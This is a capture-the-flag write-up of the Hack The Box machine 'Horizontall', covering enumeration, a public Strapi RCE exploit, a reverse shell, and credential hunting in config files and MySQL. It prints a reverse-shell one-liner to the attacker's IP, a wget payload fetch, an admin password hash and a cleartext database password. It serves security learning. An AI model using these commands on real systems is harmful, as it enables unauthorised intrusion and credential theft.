|   <span style=color:#ae81ff>2048</span> ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 <span style=color:#f92672>(</span>RSA<span style=color:#f92672>)</span>
|   <span style=color:#ae81ff>256</span> 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 <span style=color:#f92672>(</span>ECDSA<span style=color:#f92672>)</span>
|_  <span style=color:#ae81ff>256</span> 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 <span style=color:#f92672>(</span>ED25519<span style=color:#f92672>)</span>
80/tcp open  http    nginx 1.14.0 <span style=color:#f92672>(</span>Ubuntu<span style=color:#f92672>)</span>
|_http-server-header: nginx/1.14.0 <span style=color:#f92672>(</span>Ubuntu<span style=color:#f92672>)</span>
|_http-title: horizontall
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
<span style=color:#75715e># Nmap done at Fri Jan 14 03:00:05 2022 -- 1 IP address (1 host up) scanned in 10.60 seconds</span>
</code></pre></div><p>A full port scan also didn&rsquo;t reveal anything, so i manually opened it in a browser:
<img src=/img/horizontall/landing-page.png#center alt>
</p>
<p>Nothing was clickable. Also, here&rsquo;s what <code>gobuster</code> returned us:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ gobuster dir -r -u http://horizontall.htb -o gobuster.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
<span style=color:#f92672>===============================================================</span>
Gobuster v3.1.0
by OJ Reeves <span style=color:#f92672>(</span>@TheColonial<span style=color:#f92672>)</span> &amp; Christian Mehlmauer <span style=color:#f92672>(</span>@firefart<span style=color:#f92672>)</span>
<span style=color:#f92672>===============================================================</span>
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Url:                     http://horizontall.htb
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Method:                  GET
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Threads:                 <span style=color:#ae81ff>10</span>
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Negative Status codes:   <span style=color:#ae81ff>404</span>
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> User Agent:              gobuster/3.1.0
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Follow Redirect:         true
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Timeout:                 10s
<span style=color:#f92672>===============================================================</span>
2022/01/14 03:18:57 Starting gobuster in directory enumeration mode
<span style=color:#f92672>===============================================================</span>
/img                  <span style=color:#f92672>(</span>Status: 403<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 178<span style=color:#f92672>]</span>
/css                  <span style=color:#f92672>(</span>Status: 403<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 178<span style=color:#f92672>]</span>
/js                   <span style=color:#f92672>(</span>Status: 403<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 178<span style=color:#f92672>]</span>
                                               
<span style=color:#f92672>===============================================================</span>
2022/01/14 03:25:24 Finished
<span style=color:#f92672>===============================================================</span>
</code></pre></div><p>Nothing new, isn&rsquo;t it? I also check the javascript source code but seems like nothing novel showed up.</p>
<p>At this point, I remembered a small ctf trick - if the challenge calls for any amendment in <code>/etc/hosts</code> file, the answer must lie somewhere among the subdomains. Therefore, I set up a subdomain fuzzer like this:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>wfuzz --oF wfuzz -c -f wfuzz.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u <span style=color:#e6db74>&#34;http://horizontall.htb&#34;</span> -H <span style=color:#e6db74>&#34;Host: FUZZ.horizontall.htb&#34;</span> --hc <span style=color:#ae81ff>301</span>                                                       
</code></pre></div><p>And it perfectly worked:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ wfuzz --oF wfuzz -c -f wfuzz.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u <span style=color:#e6db74>&#34;http://horizontall.htb&#34;</span> -H <span style=color:#e6db74>&#34;Host: FUZZ.horizontall.htb&#34;</span> --hc <span style=color:#ae81ff>301</span>                                                       
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://horizontall.htb/
Total requests: 114441

<span style=color:#f92672>=====================================================================</span>
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                      
<span style=color:#f92672>=====================================================================</span>

000000001:   <span style=color:#ae81ff>200</span>        <span style=color:#ae81ff>1</span> L      <span style=color:#ae81ff>43</span> W       <span style=color:#ae81ff>901</span> Ch      <span style=color:#e6db74>&#34;www&#34;</span>                                                                                                                                                                        
000047093:   <span style=color:#ae81ff>200</span>        <span style=color:#ae81ff>19</span> L     <span style=color:#ae81ff>33</span> W       <span style=color:#ae81ff>413</span> Ch      <span style=color:#e6db74>&#34;api-prod&#34;</span>                                                                                                                                                                   

Total time: 641.3004
Processed Requests: <span style=color:#ae81ff>114441</span>
Filtered Requests: <span style=color:#ae81ff>114439</span>
Requests/sec.: 178.4514
</code></pre></div><p>Takes about 10 minutes with a mediocre virtual machine. However, we have found a new attack surface - that <code>api-prod</code> endpoint.</p>
<p>But all else aside, we must add that enpoint to our <code>/etc/hosts</code> file first.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>10.10.11.105    api-prod.horizontall.htb 
</code></pre></div><h2 id=ii-api-attack>II. API attack<a hidden class=anchor aria-hidden=true href=#ii-api-attack>#</a></h2>
<p>Upon opening that endpoint in a browser, here&rsquo;s what we have:
<img src=/img/horizontall/api-prod.png#center alt>
</p>
<p>Well, thanks I guess?</p>
<p>We will follow the exact same procedure for the new API endpoint. Here is the <code>Gobuster</code> result:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>/reviews              <span style=color:#f92672>(</span>Status: 200<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 507<span style=color:#f92672>]</span>
/users                <span style=color:#f92672>(</span>Status: 403<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 60<span style=color:#f92672>]</span>
/admin                <span style=color:#f92672>(</span>Status: 200<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 854<span style=color:#f92672>]</span>
/Reviews              <span style=color:#f92672>(</span>Status: 200<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 507<span style=color:#f92672>]</span>
/Users                <span style=color:#f92672>(</span>Status: 403<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 60<span style=color:#f92672>]</span>
/Admin                <span style=color:#f92672>(</span>Status: 200<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 854<span style=color:#f92672>]</span>
/REVIEWS              <span style=color:#f92672>(</span>Status: 200<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 507<span style=color:#f92672>]</span>
/%C0                  <span style=color:#f92672>(</span>Status: 400<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 69<span style=color:#f92672>]</span>
/%C0~                 <span style=color:#f92672>(</span>Status: 400<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 69<span style=color:#f92672>]</span>
/%C0.bak              <span style=color:#f92672>(</span>Status: 400<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 69<span style=color:#f92672>]</span>
/%C0.bak2             <span style=color:#f92672>(</span>Status: 400<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 69<span style=color:#f92672>]</span>
/%C0.old              <span style=color:#f92672>(</span>Status: 400<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 69<span style=color:#f92672>]</span>
/%C0.1                <span style=color:#f92672>(</span>Status: 400<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 69<span style=color:#f92672>]</span>
/.%C0.swp             <span style=color:#f92672>(</span>Status: 400<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>Size: 69<span style=color:#f92672>]</span>
</code></pre></div><p>As you can see, there are many interesting things to check here. But first, let&rsquo;s get to <code>/admin</code> endpoint.</p>
<p>
<img src=/img/horizontall/api-admin.png#center alt>
</p>
<p>So the technology behind is <code>strapi</code>. A quick <code>searchsploit</code> result revealed a critical RCE vulnerability.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ searchsploit strapi
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Strapi 3.0.0-beta - Set Password <span style=color:#f92672>(</span>Unauthenticated<span style=color:#f92672>)</span>                                                                                                                                                          | multiple/webapps/50237.py
Strapi 3.0.0-beta.17.7 - Remote Code Execution <span style=color:#f92672>(</span>RCE<span style=color:#f92672>)</span> <span style=color:#f92672>(</span>Authenticated<span style=color:#f92672>)</span>                                                                                                                                        | multiple/webapps/50238.py
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution <span style=color:#f92672>(</span>RCE<span style=color:#f92672>)</span> <span style=color:#f92672>(</span>Unauthenticated<span style=color:#f92672>)</span>                                                                                                                                  | multiple/webapps/50239.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
</code></pre></div><p>Choose one that you like, then simply execute it. Here, I used <code>50239.py</code>:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ python3 50239.py http://api-prod.horizontall.htb
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Checking Strapi CMS Version running
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Seems like the exploit will work!!!
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Executing exploit


<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Password reset was successfully
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Your email is: admin@horizontall.htb
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Your new credentials are: admin:SuperStrongPassword1
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQzODc3NTg2LCJleHAiOjE2NDY0Njk1ODZ9.p_uvCIHcKXwruPv8na6MVpU-aLInNKphFDvOh7zYs5U


$&gt; 
</code></pre></div><p>However, running a command resulted in an error:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$&gt; id
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Triggering Remote code executin
<span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> Rember this is a blind RCE <span style=color:#66d9ef>do</span> not expect to see output
<span style=color:#f92672>{</span><span style=color:#e6db74>&#34;statusCode&#34;</span>:400,<span style=color:#e6db74>&#34;error&#34;</span>:<span style=color:#e6db74>&#34;Bad Request&#34;</span>,<span style=color:#e6db74>&#34;message&#34;</span>:<span style=color:#f92672>[{</span><span style=color:#e6db74>&#34;messages&#34;</span>:<span style=color:#f92672>[{</span><span style=color:#e6db74>&#34;id&#34;</span>:<span style=color:#e6db74>&#34;An error occurred&#34;</span><span style=color:#f92672>}]}]}</span>
</code></pre></div><p>At first I was doubtful about some shoddy programming. However, it really did successfully make a call back.
<img src=/img/horizontall/pingback.png#center alt>
</p>
<p>Therefore, I spinned up an one liner reverse shell like this:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=color:#75715e>#!/bin/sh
</span><span style=color:#75715e></span>
sh -i &gt;&amp; /dev/tcp/10.10.16.13/9000 0&gt;&amp;<span style=color:#ae81ff>1</span>
</code></pre></div><p>And download it to target machine.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$&gt; wget 10.10.16.13/rv.sh
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Triggering Remote code executin
<span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> Rember this is a blind RCE <span style=color:#66d9ef>do</span> not expect to see output
<span style=color:#f92672>{</span><span style=color:#e6db74>&#34;statusCode&#34;</span>:400,<span style=color:#e6db74>&#34;error&#34;</span>:<span style=color:#e6db74>&#34;Bad Request&#34;</span>,<span style=color:#e6db74>&#34;message&#34;</span>:<span style=color:#f92672>[{</span><span style=color:#e6db74>&#34;messages&#34;</span>:<span style=color:#f92672>[{</span><span style=color:#e6db74>&#34;id&#34;</span>:<span style=color:#e6db74>&#34;An error occurred&#34;</span><span style=color:#f92672>}]}]}</span>
</code></pre></div><p>We can clearly see it was successfully transferred from our attacking machine:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ python3 -m http.server <span style=color:#ae81ff>80</span>
Serving HTTP on 0.0.0.0 port <span style=color:#ae81ff>80</span> <span style=color:#f92672>(</span>http://0.0.0.0:80/<span style=color:#f92672>)</span> ...
10.10.11.105 - - <span style=color:#f92672>[</span>03/Feb/2022 03:55:37<span style=color:#f92672>]</span> <span style=color:#e6db74>&#34;GET /rv.sh HTTP/1.1&#34;</span> <span style=color:#ae81ff>200</span> -
</code></pre></div><p>And upon triggering the script:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$&gt; bash rv.sh
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Triggering Remote code executin
<span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> Rember this is a blind RCE <span style=color:#66d9ef>do</span> not expect to see output
</code></pre></div><p>We got a reverse shell:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ nc -lvnp <span style=color:#ae81ff>9000</span>
listening on <span style=color:#f92672>[</span>any<span style=color:#f92672>]</span> <span style=color:#ae81ff>9000</span> ...
connect to <span style=color:#f92672>[</span>10.10.16.13<span style=color:#f92672>]</span> from <span style=color:#f92672>(</span>UNKNOWN<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>10.10.11.105<span style=color:#f92672>]</span> <span style=color:#ae81ff>43566</span>
sh: 0: can<span style=color:#960050;background-color:#1e0010>&#39;</span>t access tty; job control turned off
$ id
uid<span style=color:#f92672>=</span>1001<span style=color:#f92672>(</span>strapi<span style=color:#f92672>)</span> gid<span style=color:#f92672>=</span>1001<span style=color:#f92672>(</span>strapi<span style=color:#f92672>)</span> groups<span style=color:#f92672>=</span>1001<span style=color:#f92672>(</span>strapi<span style=color:#f92672>)</span>
</code></pre></div><h2 id=iii-user-flag>III. User flag<a hidden class=anchor aria-hidden=true href=#iii-user-flag>#</a></h2>
<p>After a 5-second recon, I relized that <code>strapi</code> user had sufficient permission to read the user flag at <code>/home/developer/user.txt</code>.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ ls /home
developer
$ cd /home/developer
$ ls -al
total <span style=color:#ae81ff>108</span>
drwxr-xr-x  <span style=color:#ae81ff>8</span> developer developer  <span style=color:#ae81ff>4096</span> Aug  <span style=color:#ae81ff>2</span>  <span style=color:#ae81ff>2021</span> .
drwxr-xr-x  <span style=color:#ae81ff>3</span> root      root       <span style=color:#ae81ff>4096</span> May <span style=color:#ae81ff>25</span>  <span style=color:#ae81ff>2021</span> ..
lrwxrwxrwx  <span style=color:#ae81ff>1</span> root      root          <span style=color:#ae81ff>9</span> Aug  <span style=color:#ae81ff>2</span>  <span style=color:#ae81ff>2021</span> .bash_history -&gt; /dev/null
-rw-r-----  <span style=color:#ae81ff>1</span> developer developer   <span style=color:#ae81ff>242</span> Jun  <span style=color:#ae81ff>1</span>  <span style=color:#ae81ff>2021</span> .bash_logout
-rw-r-----  <span style=color:#ae81ff>1</span> developer developer  <span style=color:#ae81ff>3810</span> Jun  <span style=color:#ae81ff>1</span>  <span style=color:#ae81ff>2021</span> .bashrc
drwx------  <span style=color:#ae81ff>3</span> developer developer  <span style=color:#ae81ff>4096</span> May <span style=color:#ae81ff>26</span>  <span style=color:#ae81ff>2021</span> .cache
-rw-rw----  <span style=color:#ae81ff>1</span> developer developer <span style=color:#ae81ff>58460</span> May <span style=color:#ae81ff>26</span>  <span style=color:#ae81ff>2021</span> composer-setup.php
drwx------  <span style=color:#ae81ff>5</span> developer developer  <span style=color:#ae81ff>4096</span> Jun  <span style=color:#ae81ff>1</span>  <span style=color:#ae81ff>2021</span> .config
drwx------  <span style=color:#ae81ff>3</span> developer developer  <span style=color:#ae81ff>4096</span> May <span style=color:#ae81ff>25</span>  <span style=color:#ae81ff>2021</span> .gnupg
drwxrwx---  <span style=color:#ae81ff>3</span> developer developer  <span style=color:#ae81ff>4096</span> May <span style=color:#ae81ff>25</span>  <span style=color:#ae81ff>2021</span> .local
drwx------ <span style=color:#ae81ff>12</span> developer developer  <span style=color:#ae81ff>4096</span> May <span style=color:#ae81ff>26</span>  <span style=color:#ae81ff>2021</span> myproject
-rw-r-----  <span style=color:#ae81ff>1</span> developer developer   <span style=color:#ae81ff>807</span> Apr  <span style=color:#ae81ff>4</span>  <span style=color:#ae81ff>2018</span> .profile
drwxrwx---  <span style=color:#ae81ff>2</span> developer developer  <span style=color:#ae81ff>4096</span> Jun  <span style=color:#ae81ff>4</span>  <span style=color:#ae81ff>2021</span> .ssh
-r--r--r--  <span style=color:#ae81ff>1</span> developer developer    <span style=color:#ae81ff>33</span> Feb  <span style=color:#ae81ff>3</span> 08:06 user.txt
lrwxrwxrwx  <span style=color:#ae81ff>1</span> root      root          <span style=color:#ae81ff>9</span> Aug  <span style=color:#ae81ff>2</span>  <span style=color:#ae81ff>2021</span> .viminfo -&gt; /dev/null
</code></pre></div><p>Or, to be precise, anyone on the box can read that <code>user.txt</code> file. Just <code>cat</code> it out and we got the user flag.</p>
<h2 id=iv-privilege-escalation>IV. Privilege Escalation<a hidden class=anchor aria-hidden=true href=#iv-privilege-escalation>#</a></h2>
<p>Or a seem-very-real rabbit hole that I felt into. If you are not interested, you can jump to <a href=#vi-real-privilege-escalation>real privilege escalation section</a>.</p>
<p>Here&rsquo;s the starting point of a miserable failure:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ uname -a
Linux horizontall 4.15.0-154-generic <span style=color:#75715e>#161-Ubuntu SMP Fri Jul 30 13:04:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux</span>
</code></pre></div><p>And we can find so many &ldquo;potential&rdquo; payloads with just that information.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ searchsploit linux kernel 4.15.0                                                                                                                                                                                                    <span style=color:#ae81ff>130</span> ⨯
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Linux Kernel <span style=color:#f92672>(</span>Solaris <span style=color:#ae81ff>10</span> / &lt; 5.10 138888-01<span style=color:#f92672>)</span> - Local Privilege Escalation                                                                                                                                   | solaris/local/15962.c
Linux Kernel 2.4/2.6 <span style=color:#f92672>(</span>RedHat Linux <span style=color:#ae81ff>9</span> / Fedora Core <span style=color:#ae81ff>4</span> &lt; <span style=color:#ae81ff>11</span> / Whitebox <span style=color:#ae81ff>4</span> / CentOS 4<span style=color:#f92672>)</span> - <span style=color:#e6db74>&#39;sock_sendpage()&#39;</span> Ring0 Privilege Escalation <span style=color:#f92672>(</span>5<span style=color:#f92672>)</span>                                                                       | linux/local/9479.c
Linux Kernel 2.6.19 &lt; 5.9 - <span style=color:#e6db74>&#39;Netfilter Local Privilege Escalation                                                                                                                                           | linux/local/50135.c
</span><span style=color:#e6db74>Linux Kernel 4.10 &lt; 5.1.17 - &#39;</span>PTRACE_TRACEME<span style=color:#e6db74>&#39; pkexec Local Privilege Escalation                                                                                                                             | linux/local/47163.c
</span><span style=color:#e6db74>Linux Kernel 4.15.x &lt; 4.19.2 - &#39;</span>map_write<span style=color:#f92672>()</span> CAP_SYS_ADMIN<span style=color:#e6db74>&#39; Local Privilege Escalation (cron Method)                                                                                                         | linux/local/47164.sh
</span><span style=color:#e6db74>Linux Kernel 4.15.x &lt; 4.19.2 - &#39;</span>map_write<span style=color:#f92672>()</span> CAP_SYS_ADMIN<span style=color:#e6db74>&#39; Local Privilege Escalation (dbus Method)                                                                                                         | linux/local/47165.sh
</span><span style=color:#e6db74>Linux Kernel 4.15.x &lt; 4.19.2 - &#39;</span>map_write<span style=color:#f92672>()</span> CAP_SYS_ADMIN<span style=color:#e6db74>&#39; Local Privilege Escalation (ldpreload Method)                                                                                                    | linux/local/47166.sh
</span><span style=color:#e6db74>Linux Kernel 4.15.x &lt; 4.19.2 - &#39;</span>map_write<span style=color:#f92672>()</span> CAP_SYS_ADMIN<span style=color:#e6db74>&#39; Local Privilege Escalation (polkit Method)                                                                                                       | linux/local/47167.sh
</span><span style=color:#e6db74>Linux Kernel 4.8.0 UDEV &lt; 232 - Local Privilege Escalation                                                                                                                                                  | linux/local/41886.c
</span><span style=color:#e6db74>Linux Kernel &lt; 4.15.4 - &#39;</span>show_floppy<span style=color:#e6db74>&#39; KASLR Address Leak                                                                                                                                                    | linux/local/44325.c
</span><span style=color:#e6db74>Linux Kernel &lt; 4.16.11 - &#39;</span>ext4_read_inline_data<span style=color:#f92672>()</span><span style=color:#e6db74>&#39; Memory Corruption                                                                                                                                        | linux/dos/44832.txt
</span><span style=color:#e6db74>Linux Kernel &lt; 4.17-rc1 - &#39;</span>AF_LLC<span style=color:#960050;background-color:#1e0010>&#39;</span> Double Free                                                                                                                                                              | linux/dos/44579.c
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
</code></pre></div><p>After wasting an hour of mine to &ldquo;trial and error&rdquo; most of those exploits, I came to a painful conclusion that these are no use in this case.</p>
<h2 id=v-real-privilege-escalation---if-only>V. Real privilege escalation - if only<a hidden class=anchor aria-hidden=true href=#v-real-privilege-escalation---if-only>#</a></h2>
<p>Things got back to their right tracks after I crawled out of that rabbit hole. At least, that&rsquo;s what I want to say, but no.</p>
<p>It all started from this list of opening ports:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ ss -lntup
Netid  State    Recv-Q   Send-Q      Local Address:Port     Peer Address:Port                                                                                   
tcp    LISTEN   <span style=color:#ae81ff>0</span>        <span style=color:#ae81ff>128</span>             127.0.0.1:8000          0.0.0.0:*                                                                                      
tcp    LISTEN   <span style=color:#ae81ff>0</span>        <span style=color:#ae81ff>80</span>              127.0.0.1:3306          0.0.0.0:*                                                                                      
tcp    LISTEN   <span style=color:#ae81ff>0</span>        <span style=color:#ae81ff>128</span>               0.0.0.0:80            0.0.0.0:*                                                                                      
tcp    LISTEN   <span style=color:#ae81ff>0</span>        <span style=color:#ae81ff>128</span>               0.0.0.0:22            0.0.0.0:*                                                                                      
tcp    LISTEN   <span style=color:#ae81ff>0</span>        <span style=color:#ae81ff>128</span>             127.0.0.1:1337          0.0.0.0:*       users:<span style=color:#f92672>((</span><span style=color:#e6db74>&#34;node&#34;</span>,pid<span style=color:#f92672>=</span>1750,fd<span style=color:#f92672>=</span>31<span style=color:#f92672>))</span>                                                
tcp    LISTEN   <span style=color:#ae81ff>0</span>        <span style=color:#ae81ff>128</span>                  <span style=color:#f92672>[</span>::<span style=color:#f92672>]</span>:80               <span style=color:#f92672>[</span>::<span style=color:#f92672>]</span>:*                                                                                      
tcp    LISTEN   <span style=color:#ae81ff>0</span>        <span style=color:#ae81ff>128</span>                  <span style=color:#f92672>[</span>::<span style=color:#f92672>]</span>:22               <span style=color:#f92672>[</span>::<span style=color:#f92672>]</span>:*  
</code></pre></div><p>In my opinion, that <code>1337</code> port seems extremely suspicious. However, after a bit of SSH tunneling, I realized that it was only the API endpoint that we discovered earlier.</p>
<p>On the other hand, that port <code>3306</code> was the real culprit.</p>
<p>Here is another very useful command that turned out to be a menace this time:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ grep -Rnw -e <span style=color:#e6db74>&#34;password&#34;</span>
environments/production/database.json:13:        <span style=color:#e6db74>&#34;password&#34;</span>: <span style=color:#e6db74>&#34;</span><span style=color:#e6db74>${</span>process.env.DATABASE_PASSWORD || <span style=color:#e6db74>&#39;&#39;</span><span style=color:#e6db74>}</span><span style=color:#e6db74>&#34;</span>,
environments/development/database.json:12:        <span style=color:#e6db74>&#34;password&#34;</span>: <span style=color:#e6db74>&#34;#J!:F9Zt2u&#34;</span>
environments/staging/database.json:13:        <span style=color:#e6db74>&#34;password&#34;</span>: <span style=color:#e6db74>&#34;</span><span style=color:#e6db74>${</span>process.env.DATABASE_PASSWORD || <span style=color:#e6db74>&#39;&#39;</span><span style=color:#e6db74>}</span><span style=color:#e6db74>&#34;</span>,
</code></pre></div><p>Without a second thought, I instantly <code>cat</code> out that <code>development/database.json</code> file.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=color:#f92672>{</span>
  <span style=color:#e6db74>&#34;defaultConnection&#34;</span>: <span style=color:#e6db74>&#34;default&#34;</span>,
  <span style=color:#e6db74>&#34;connections&#34;</span>: <span style=color:#f92672>{</span>
    <span style=color:#e6db74>&#34;default&#34;</span>: <span style=color:#f92672>{</span>
      <span style=color:#e6db74>&#34;connector&#34;</span>: <span style=color:#e6db74>&#34;strapi-hook-bookshelf&#34;</span>,
      <span style=color:#e6db74>&#34;settings&#34;</span>: <span style=color:#f92672>{</span>
        <span style=color:#e6db74>&#34;client&#34;</span>: <span style=color:#e6db74>&#34;mysql&#34;</span>,
        <span style=color:#e6db74>&#34;database&#34;</span>: <span style=color:#e6db74>&#34;strapi&#34;</span>,
        <span style=color:#e6db74>&#34;host&#34;</span>: <span style=color:#e6db74>&#34;127.0.0.1&#34;</span>,
        <span style=color:#e6db74>&#34;port&#34;</span>: 3306,
        <span style=color:#e6db74>&#34;username&#34;</span>: <span style=color:#e6db74>&#34;developer&#34;</span>,
        <span style=color:#e6db74>&#34;password&#34;</span>: <span style=color:#e6db74>&#34;#J!:F9Zt2u&#34;</span>
      <span style=color:#f92672>}</span>,
      <span style=color:#e6db74>&#34;options&#34;</span>: <span style=color:#f92672>{}</span>
    <span style=color:#f92672>}</span>
  <span style=color:#f92672>}</span>
<span style=color:#f92672>}</span>
</code></pre></div><p>Little did I know, all these very legit credentials are traps. I happily connected to the database, browsing around a bit, and eventually got something really promising.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ mysql -h 127.0.0.1 -P <span style=color:#ae81ff>3306</span> -u developer -p strapi --password<span style=color:#f92672>=</span><span style=color:#e6db74>&#34;#J!:F9Zt2u&#34;</span> -e <span style=color:#e6db74>&#34;SELECT * FROM strapi_administrator&#34;</span>
mysql: <span style=color:#f92672>[</span>Warning<span style=color:#f92672>]</span> Using a password on the command line interface can be insecure.
id      username        email   password        resetPasswordToken      blocked
<span style=color:#ae81ff>3</span>       admin   admin@horizontall.htb   $2a$10$Z/5DNUBoQeb0hOBmD3mlous9fju9gK3FEGOVKoe.XRw4TNCTgjqu.    NULL    NULL
</code></pre></div><p>I went through hell to crack that password, only to belatedly realize that the hash was notoriously hard to brute force due to its high hashing time. Nevertheless, I managed to crack it.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>admin	SuperStrongPassword1
</code></pre></div><p>Why does this password sounds peculiarly familiar&mldr;</p>
<p>A flashback suddenly dawned on me - it was the dummy <code>admin</code> account that our <code>strapi</code> exploit script made from start! All those work, were in vain&mldr; What a memorable experience.</p>
